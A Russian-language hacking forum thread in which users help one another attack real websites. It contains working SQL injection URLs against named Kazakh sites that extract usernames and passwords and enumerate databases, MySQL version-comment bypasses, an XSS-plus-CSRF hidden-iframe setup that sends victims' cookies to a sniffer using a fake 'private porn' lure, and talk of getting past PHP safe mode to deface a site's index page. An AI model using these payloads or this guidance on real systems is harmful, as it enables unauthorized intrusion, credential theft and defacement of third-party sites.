есть такой вопрос... есть скуля.. через нее заливаю в php но тут трабла... до смд так и не добрался... safe mod on magic quotes on http include disabled как можно обойти это? функции вида system exec passthru include copy move_uploaded_file fopen и тд не пашут! c file_get_contents не разобрался до конца.. помогите +)
Заранее извеняюсь если такой вопрос здесь уже был,но я говорю честно гуглил!!!Вопщем есть на сайте пасивная хсс,могу ли я ее использовать в связке с CSRF?Тоесть я на уязвимом форуме кидаю урл на свой сайт в коде страницы которого ява скрипт суть этого скрипта в том чтобы он браузер жертвы отправлял на скрипт уявимый к хсс со всеми вытикающими!Технически это возможно?Еще раз извеняюсь если подобный вопрос уже был!Если что то не ясно спросил говорите!
технически возможно, но тебе нужно правильно составить запрос, который будет выполнятся от другого пользователя, при условии конечно если он в тот момент будет авторизован.
Артем Солнце пасиб тебе за помощь!Так будет правильно в коде страниц: <script>http://site.ru/bag.php?b=адрес_снифа</script> вроде и все же!Иль вродь напутал!А если применить ни тэги <скрипт> а тэги картинки?Забыл в каких тэгах писать нужно!Подскажите если можете!
попугай да... долго думал.. очень)) вышло все намного проще.. вот поделюсь как я обошел сейф мод в моем случае... правда после заливки и так мало что можно зделать ) терь другой вопрос... как можно редактировать файл.. при сейфмоде.. нужны команды )
попугай нет.. все функции отключены... токо eval пашет и ему спасибо) могу лол токо unlink делать.. пока что остальные отключены сейфом... идеи? сайт того стоит)
ты видимо недопонял, что такое CSRF. CSRF это межсайтовая имитация запроса пользователя к стороннему сайту, если пользователь в это время авторизован на стороннем сайте. Т.е. если я правильно понял, то ты нашел XSS на форуме, и в связке XSS и CSRF ты можешь сделать следующее: Допустим http://forum/bug-script.php?tipic=1 это ссылка бажного форума. Ты нашел там XSS и ссылка с ним выглядит допустим так: http://forum/bug-script.php?tipic=><script>alert(document.coockie)</script> Вот. Но это палевный вариант сувать такую ссылку пользователям. Теперь ты на своем сайте допустим hack2009.narod.ru размещаешь в index.html такой код: <html> <title>ERROR</title> <body> <b>ERROR</b> <iframe style="width:0px; height:0px; border: 0px" src="http://forum/bug-script.php?tipic=><script>КОД_ПЕРЕДАЧИ_СНИФЕРУ</script>"></iframe> </body> </html> и пишешь на форуме в ЛС любому пользователю, мол "смотри тут преватное порно hack2009.narod.ru". Он переходит из ЛС на твой сайт и там выполняется CSRF+XSS. Куки твои. Молодец. Пять. p.s. может где-то ошибся просто время уже 3:05 пиши сюда помогу чем могу
попугай да ( даже незнаю, вот есть идея.. через скулю прочесть index.php скопировать его и модифицировать под себя.. потом удалить index.php на сервере, и создать свой индекс... токо если есть права на запись... и возможно удалить index
Code: http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,version(),user(),database())-- Не могу понять, нашел все таблицы, но ни в одну не пускает, может ктонить поможет?
В каком плане "не пускает"? Code: http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,name,pass)+from+noc--
Да, через лимит. Возможно, ты не мог сделать вывод к примеру из "ibf_members". Это потому, что таблица лежит в другой бд, "forum.ibf_members"
Спасибо, большое! Все понял, а как часто вот так вот нужно к именам таблиц что-то добавлять, и как узнать что именно добавлять?
Code: http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,table_name,table_schema)+from+information_schema.tables+limit+45,1-- table_name - имя таблицы table_schema - бд, в которой таблица В данном случае - ibf_cal_events:forum, значит запрос будет выглядеть: from+froum.ibf_cal_events
Вот еще, Code: http://rabota.kz/candidates/vacancies.php?cat=123+order+by+2-- прекрассно видно что только два числа должны отображаться, а при вводе Code: http://rabota.kz/candidates/vacancies.php?cat=123+union+select+1,2-- выдает ошибку, объясните плз, где я ошибся? Заранее благодарен!
версия мускула = 3+ там нет union select http://rabota.kz/candidates/vacancies.php?cat=123+/*!30000+union+select+1,2*//* http://rabota.kz/candidates/vacancies.php?cat=123+/*!40000+union+select+1,2*//*
